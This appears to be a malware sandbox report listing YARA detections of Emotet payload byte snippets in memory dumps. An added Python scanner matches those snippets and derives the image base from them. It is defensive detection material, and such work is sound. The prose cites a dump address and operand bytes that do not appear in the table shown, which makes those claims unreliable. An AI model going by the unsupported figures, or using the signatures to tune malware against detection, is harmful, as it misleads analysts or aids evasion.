00000002.00000002.1239429666.0000000000EB1000.00000020.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security
00000002.00000002.1239429666.0000000000EB1000.00000020.00000001.sdmp | Emotet | Emotet Payload | kevoreilly
    Strings: 0xfad:$snippet2: 6A 13 68 01 00 01 00 FF 15 0C 02 EC 00 85 C0
             0x50d4:$snippet6: 33 C0 21 05 4C 25 EC 00 A3 48 25 EC 00 39 05 70 F3 EB 00 74 18 40 A3 48 25 EC 00 83 3C C5 70 F3 ...
00000001.00000002.1244085000.0000000000621000.00000020.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security
00000001.00000002.1244085000.0000000000621000.00000020.00000001.sdmp | Emotet | Emotet Payload | kevoreilly
    Strings: 0xfad:$snippet2: 6A 13 68 01 00 01 00 FF 15 0C 02 63 00 85 C0
             0x50d4:$snippet6: 33 C0 21 05 4C 25 63 00 A3 48 25 63 00 39 05 70 F3 62 00 74 18 40 A3 48 25 63 00 83 3C C5 70 F3 ...
00000000.00000002.1207968367.0000000000470000.00000040.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security
00000000.00000002.1207968367.0000000000470000.00000040.00000001.sdmp | Emotet | Emotet Payload | kevoreilly
    Strings: 0x18ec:$snippet2: 6A 13 68 01 00 01 00 FF 15 0C 02 41 00 85 C0
             0x5a13:$snippet6: 33 C0 21 05 4C 25 41 00 A3 48 25 41 00 39 05 70 F3 40 00 74 18 40 A3 48 25 41 00 83 3C C5 70 F3 ...
00000003.00000002.2915763997.0000000000E50000.00000040.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security
00000003.00000002.2915763997.0000000000E50000.00000040.00000001.sdmp | Emotet | Emotet Payload | kevoreilly
    Strings: 0x18ec:$snippet2: 6A 13 68 01 00 01 00 FF 15 0C 02 41 00 85 C0
             0x5a13:$snippet6: 33 C0 21 05 4C 25 41 00 A3 48 25 41 00 39 05 70 F3 40 00 74 18 40 A3 48 25 41 00 83 3C C5 70 F3 ...
00000003.00000002.2915815200.0000000000E61000.00000020.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security
00000003.00000002.2915815200.0000000000E61000.00000020.00000001.sdmp | Emotet | Emotet Payload | kevoreilly
    Strings: 0xfad:$snippet2: 6A 13 68 01 00 01 00 FF 15 0C 02 E7 00 85 C0
             0x50d4:$snippet6: 33 C0 21 05 4C 25 E7 00 A3 48 25 E7 00 39 05 70 F3 E6 00 74 18 40 A3 48 25 E7 00 83 3C C5 70 F3 ...
00000001.00000002.1244031414.0000000000610000.00000040.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security
00000001.00000002.1244031414.0000000000610000.00000040.00000001.sdmp | Emotet | Emotet Payload | kevoreilly
    Strings: 0x18ec:$snippet2: 6A 13 68 01 00 01 00 FF 15 0C 02 41 00 85 C0
             0x5a13:$snippet6: 33 C0 21 05 4C 25 41 00 A3 48 25 41 00 39 05 70 F3 40 00 74 18 40 A3 48 25 41 00 83 3C C5 70 F3 ...

Unpacked PEs

No yara matches
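The Memory Dumps table above shows the same two Emotet code snippets matched in dumps whose address operands end in 41 00, 21 02, EC 00, 63 00 and E7 00: only the absolute-address operands change with the image base. The following added example (not the CAPE rule by kevoreilly that produced the matches, whose full text is not on this page, and not Joe Sandbox code) scans a buffer with those operands wildcarded and reads the image base back out of the match, so the signature holds regardless of where the payload was mapped. It uses only the two byte strings printed in the table; the RVAs it derives come from the base-0x400000 matches, and treating them as fixed across the other dumps is an assumption the table's own numbers bear out. scan, emotet_payload_base and build_sample are the example's own names, and the sample buffer is constructed.

```python
"""Added example, not the CAPE Emotet rule and not Joe Sandbox code: a
base-independent scan for the two Emotet code snippets printed in the
report's Memory Dumps table, plus recovery of the image base from a match.
"""
import re
import struct
from dataclasses import dataclass

# Operand values printed for the base-0x400000 dumps.
REF_BASE = 0x400000
REF_SNIPPET2_IAT = 0x0041020C      # FF 15 0C 02 41 00: call dword ptr [0041020Ch]
REF_SNIPPET6_ADDRS = (0x0041254C,  # 21 05 4C 25 41 00: and  [0041254Ch], eax
                      0x00412548,  # A3 48 25 41 00:    mov  [00412548h], eax
                      0x0040F370,  # 39 05 70 F3 40 00: cmp  [0040F370h], eax
                      0x00412548,  # A3 48 25 41 00:    mov  [00412548h], eax
                      0x0040F370)  # 83 3C C5 70 F3 ..: cmp  dword ptr [eax*8+0040F370h], imm8

# $snippet2:  6A 13 / 68 01 00 01 00 / FF 15 ?? ?? ?? ?? / 85 C0
#             push 13h / push 10001h / call dword ptr [imm32] / test eax, eax
SNIPPET2 = re.compile(rb"\x6A\x13\x68\x01\x00\x01\x00\xFF\x15(.{4})\x85\xC0", re.DOTALL)

# $snippet6, the prefix the table prints (it is cut off after 83 3C C5 and
# the disp32, so the trailing imm8 is not part of the pattern):
#   33 C0 / 21 05 ???? / A3 ???? / 39 05 ???? / 74 18 / 40 / A3 ???? / 83 3C C5 ????
#   xor eax,eax / and [a],eax / mov [b],eax / cmp [c],eax / jz +18h / inc eax
#   / mov [b],eax / cmp dword ptr [eax*8+c],imm8
SNIPPET6 = re.compile(
    rb"\x33\xC0\x21\x05(.{4})\xA3(.{4})\x39\x05(.{4})\x74\x18\x40\xA3(.{4})\x83\x3C\xC5(.{4})",
    re.DOTALL,
)


def _u32(b: bytes) -> int:
    return struct.unpack("<I", b)[0]


@dataclass
class Hit:
    name: str
    offset: int
    base: int          # image base implied by the operand(s)
    consistent: bool   # every operand in the match implies the same base


def scan(buf: bytes) -> list[Hit]:
    """All snippet matches in buf, each with the image base its operands imply."""
    hits = []
    for m in SNIPPET2.finditer(buf):
        hits.append(Hit("snippet2", m.start(), _u32(m.group(1)) - (REF_SNIPPET2_IAT - REF_BASE), True))
    for m in SNIPPET6.finditer(buf):
        bases = {_u32(m.group(i + 1)) - (ref - REF_BASE) for i, ref in enumerate(REF_SNIPPET6_ADDRS)}
        hits.append(Hit("snippet6", m.start(), min(bases), len(bases) == 1))
    return hits


def emotet_payload_base(buf: bytes):
    """Image base if both snippets match and agree on it, else None.  Requiring
    agreement rejects a buffer that merely contains the opcode bytes with
    unrelated operands."""
    hits = scan(buf)
    s2 = {h.base for h in hits if h.name == "snippet2"}
    s6 = {h.base for h in hits if h.name == "snippet6" and h.consistent}
    common = s2 & s6
    return min(common) if common else None


def build_sample(base: int, pad: int = 0x200) -> bytes:
    """Constructed test input: both snippets relocated to `base`, with filler
    around them.  The imm8 after the last disp32 is not shown in the table;
    0x00 here is a placeholder the patterns never look at."""
    rel = lambda ref: struct.pack("<I", ref - REF_BASE + base)
    a = [rel(r) for r in REF_SNIPPET6_ADDRS]
    s2 = b"\x6A\x13\x68\x01\x00\x01\x00\xFF\x15" + rel(REF_SNIPPET2_IAT) + b"\x85\xC0"
    s6 = (b"\x33\xC0\x21\x05" + a[0] + b"\xA3" + a[1] + b"\x39\x05" + a[2]
          + b"\x74\x18\x40\xA3" + a[3] + b"\x83\x3C\xC5" + a[4] + b"\x00")
    return b"\x90" * pad + s2 + b"\xCC" * pad + s6 + b"\x90" * pad


if __name__ == "__main__":
    # The five bases the table's operands imply: 0x400000 plus one per relocated dump.
    for base in (0x00400000, 0x02200000, 0x00EB0000, 0x00620000, 0x00E60000):
        print(hex(base), hex(emotet_payload_base(build_sample(base))))
```

Run scan over a dump's bytes (read the file in binary mode and pass the content) to apply it to the dumps in the table. For the dumps whose start address ends in 1000 the recovered base is 0x1000 below that address (0x2200000 for the dump at 0x2201000, 0xEB0000 for 0xEB1000, 0x620000 for 0x621000, 0xE60000 for 0xE61000), the usual .text section at base+0x1000; the dumps at 0x610000, 0x470000 and 0xE50000 still carry 0x400000 operands, so the function reports 0x400000 for them, which identifies them as copies of the unrelocated image.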

Sigma Overview

No Sigma rule has matched

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Screenshots

(Screenshot thumbnails not reproduced in this text version.)